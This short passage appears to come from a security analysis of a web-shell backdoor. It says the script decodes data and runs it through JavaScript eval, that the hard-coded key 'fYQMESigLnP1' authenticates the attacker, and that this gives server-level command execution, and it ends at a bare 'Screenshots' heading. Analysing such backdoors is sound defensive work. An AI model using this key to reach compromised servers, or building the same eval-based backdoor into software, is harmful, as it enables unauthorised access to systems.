The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "fYQMESigLnP1" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots